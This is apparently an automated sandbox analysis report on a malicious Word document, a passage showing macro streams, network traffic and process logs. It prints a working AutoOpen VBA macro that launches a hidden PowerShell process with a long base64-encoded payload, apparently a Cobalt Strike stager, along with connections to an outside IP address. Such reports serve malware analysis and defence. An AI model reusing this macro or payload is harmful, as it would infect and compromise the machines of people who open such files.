        Stream Size:994
        Data ASCII:. . . . . . . . . \\ . . . . . . . . . . . . . . . c . . . 3 . . . . . . . . . . . e y . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 00 f0 00 00 00 5c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 63 02 00 00 33 03 00 00 00 00 00 00 01 00 00 00 65 79 e6 24 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "Module1"
        Sub AutoOpen()
            Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
        End Sub
        VBA File Name: ThisDocument.cls, Stream Size: 924
        General
        Stream Path:Macros/VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:924
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e y . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 00 f0 00 00 00 9e 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff a5 02 00 00 f9 02 00 00 00 00 00 00 01 00 00 00 65 79 11 5b 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "ThisDocument"
        Attribute VB_Base = "1Normal.ThisDocument"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = True
        Attribute VB_Customizable = True

        Streams

        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
        General
        Stream Path:\x1CompObj
        File Type:data
        Stream Size:114
        Entropy:4.2359563651
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5DocumentSummaryInformation
        File Type:data
        Stream Size:4096
        Entropy:0.234884867794
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5SummaryInformation
        File Type:data
        Stream Size:4096
        Entropy:0.491445346068
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s a l e s . . . . . . . . . . . . . . . . . . . . . . . N o r m
        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 07 00 00 00 c4 00 00 00 08 00 00 00 d4 00 00 00 09 00 00 00 fc 00 00 00 12 00 00 00 08 01 00 00
        Stream Path: 1Table, File Type: data, Stream Size: 7157
        General
        Stream Path:1Table
        File Type:data
        Stream Size:7157
        Entropy:5.87317540429
        Base64 Encoded:True
        Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
        Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
        Stream Path: Macros/CatchMeIfYouCan/\x1CompObj, File Type: data, Stream Size: 97
        General
        Stream Path:Macros/CatchMeIfYouCan/\x1CompObj
        File Type:data
        Stream Size:97
        Entropy:3.61064918306
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: Macros/CatchMeIfYouCan/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 313
        General
        Stream Path:Macros/CatchMeIfYouCan/\x3VBFrame
        File Type:ASCII text, with CRLF line terminators
        Stream Size:313
        Entropy:4.72397690372
        Base64 Encoded:True
        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } C a t c h M e I f Y o u C a n . . C a p t i o n = " C o b a l t S t r i k e I s E v e r y w h e r e " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i
        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 43 61 74 63 68 4d 65 49 66 59 6f 75 43 61 6e 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 43 6f 62 61 6c 74 53 74 72 69 6b 65 49 73 45 76 65 72 79 77 68 65 72 65 22 0d 0a
        Stream Path: Macros/CatchMeIfYouCan/f, File Type: data, Stream Size: 7566
        General
        Stream Path:Macros/CatchMeIfYouCan/f
        File Type:data
        Stream Size:7566
        Entropy:4.47380437593
        Base64 Encoded:False
        Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . L . . . . . h o . . D . . . . . . . . . . . . . T . . . . . . . . . . . S q u i d G a m e . i . . . . . . . . . J A B z A D 0 A T g B l A H c A L Q B P A G I A a g B l A G M A d A A g A E k A T w A u A E 0 A Z Q B t A G 8 A c g B 5 A F M A d A B y A G U A Y Q B t A C g A L A B b A E M A b w B u A H Y A Z Q B y A H Q A X Q A 6 A D o A R g B y A G 8 A b Q B C A G E A c w B l A D Y A N A B T A H Q A c g B p A G 4 A Z w
        Data Raw:00 04 24 00 48 0c 00 0c 01 00 00 00 04 40 00 00 02 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 4c 1d 00 00 00 01 68 6f 00 00 44 1d e5 09 00 00 09 00 00 80 01 00 00 00 54 00 00 00 00 00 1a 00 18 1d 00 80 53 71 75 69 64 47 61 6d 65 00 69 00 b1 fc ff ff a7 01 00 00 4a 41 42 7a 41 44 30 41 54 67 42 6c 41 48 63 41 4c 51 42 50 41 47 49 41 61 67
        Stream Path: Macros/CatchMeIfYouCan/o, File Type: data, Stream Size: 84
        General
        Stream Path:Macros/CatchMeIfYouCan/o
        File Type:data
        Stream Size:84
        Entropy:3.52158187156
        Base64 Encoded:False
        Data ASCII:. . 4 . F . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . 0 . . . C h e c k B o x 1 . i . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . .
        Data Raw:00 02 34 00 46 01 c0 80 00 00 00 00 0f 00 00 80 12 00 00 80 04 00 00 00 01 00 00 80 09 00 00 80 53 16 00 00 fc 0e 00 00 30 00 2e 00 43 68 65 63 6b 42 6f 78 31 00 69 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 00 02 00 00 54 61 68 6f 6d 61 00 00
        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 557
        General
        Stream Path:Macros/PROJECT
        File Type:ASCII text, with CRLF line terminators
        Stream Size:557
        Entropy:5.40366078681
        Base64 Encoded:True
        Data ASCII:I D = " { A 8 A 9 9 B 2 1 - 8 6 A 6 - 4 F 4 4 - 9 0 4 F - 5 A 4 A 5 C E 1 B 7 8 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = C a t c h M e I f Y o u C a n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 5 C 7 2 0 9 B 6 0 D 6 6
        Data Raw:49 44 3d 22 7b 41 38 41 39 39 42 32 31 2d 38 36 41 36 2d 34 46 34 34 2d 39 30 34 46 2d 35 41 34 41 35 43 45 31 42 37 38 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d
        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 113
        General
        Stream Path:Macros/PROJECTwm
        File Type:data
        Stream Size:113
        Entropy:3.53112839297
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . C a t c h M e I f Y o u C a n . C . a . t . c . h . M . e . I . f . Y . o . u . C . a . n . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 43 61 74 63 68 4d 65 49 66 59 6f 75 43 61 6e 00 43 00 61 00 74 00 63 00 68 00 4d 00 65 00 49 00 66 00 59 00 6f 00 75 00 43 00 61 00 6e 00 00 00 00 00
        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3394
        General
        Stream Path:Macros/VBA/_VBA_PROJECT
        File Type:data
        Stream Size:3394
        Entropy:4.19629379536
        Base64 Encoded:False
        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
        Data Raw:cc 61 b2 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 889
        General
        Stream Path:Macros/VBA/dir
        File Type:data
        Stream Size:889
        Entropy:6.52837099171
        Base64 Encoded:True
        Data ASCII:. u . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . m . x c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . & . . b .
        Data Raw:01 75 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 6d 00 78 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
        Stream Path: WordDocument, File Type: data, Stream Size: 4096
        General
        Stream Path:WordDocument
        File Type:data
        Stream Size:4096
        Entropy:0.997259699674
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j b 3 b 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . g . Y . g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:ec a5 c1 00 1f 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 01 08 00 00 0e 00 62 6a 62 6a 62 33 62 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 00 59 e8 67 00 59 e8 67 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Nov 15, 2021 19:27:52.864898920 CET491658080192.168.2.22176.103.56.89
        Nov 15, 2021 19:27:52.916496992 CET808049165176.103.56.89192.168.2.22
        Nov 15, 2021 19:27:53.421241045 CET491658080192.168.2.22176.103.56.89
        Nov 15, 2021 19:27:53.474045038 CET808049165176.103.56.89192.168.2.22
        Nov 15, 2021 19:27:53.982858896 CET491658080192.168.2.22176.103.56.89
        Nov 15, 2021 19:27:54.035299063 CET808049165176.103.56.89192.168.2.22

        Code Manipulations

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:19:28:12
        Start date:15/11/2021
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fc50000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:19:28:16
        Start date:15/11/2021
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARABCAGYAawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoAGUATABzAGIAZABuAGgAeQA5AGsAOQBSADUAcQBrAE8AdABxADMAQgBvAGoAYwBDADIAMAA1AFgAawBpAEEAWABxAEMAWABnAEoAYwBpAE0AUQBoAE4AcwBQAFEAYQArAGEARQBxAEgAdABIADMAUQBHAEQAbQBSAE4ATgA2AEsATgBHAFYAYQBDAFcAYwBwAE0AOQB1ADIATgBiAFIATgBlADEATwBXAFYAVQBlAGoAdwBUAEYAeABIAHcAUABQADkAOQB2AEgANwB0AE0AbQBsAFQAdgBpAGwASwA3AGcAVgBiAGgAdAB6AHAATgBPAEoAMwA2AG8AdAA3AG0ATgA5ADkAaABOAFYAOABhAHEAVwBUACsARQBnAHUAYgBlADcANwBYADcASgB1AEgAYQA0AFoANwBUACsAdQB6AFMAUABNADQAYQBpAC8AMABZADcAUgA0ADIAOQBwAHYASQBiAEcAZAB6AGkANQA4ADgASABlAGYAOQB4AFUAcgBiAHMAbwAyAFcAdABGADUANgAwAHcAVQB0AFMAawBKAEMATAA5AGkARQBzAEEAdQArAHQAWgBoAFoAKwBtAGkAMgA3AFAAVAA3AHIAQgB4AHAAZgBjADkAbQBUADYASABNAG4AMwBZADkASABmAEkAeABwADAALwBMAEoAUwBzAFQAUABaAEgAVwB2AGIAbgA0AHgARABMADYAWABEAG4AcQBtAGIAMwBjAFIAcAArAFYAWgBIAFcAOQBaAGQAZwBHAEYAMgBzAHoAYQBkADYAYgBTADcASwB3AGwANQBiADgAZgBEAFkAYQBtADgAZgBEAGsAOQBIAG4ARgBpAHUARgBuAC8ASAAzADkAbgAxAEwATgAxAHIAMwBoAHQAYwA5AEMASABIAHoAbgByAFYAWgBKADAAWgAxAHMANQBKADAAVgBOAHUAKwBmADIAagB2AHUAQwBXAHoAVwB3AFoAcgBtAGYAZQBUAEoAUgBUAEgAZABHAEcAZABqAEEAZQByADAAeAByAEYASgBwAHIAdQAyAC8AUABPAFEAZQBWAFgAWAB0AHcAUQBKAEgAbwBtAGUAWQByADkARwBEAC8ATQBrAFMASAB2AE8ARwA0AHQAVABmAGMASABvADgARgAxAFQAMgA5AG0AMwAyADUAQgBlAGIAbABuAHAAUQBS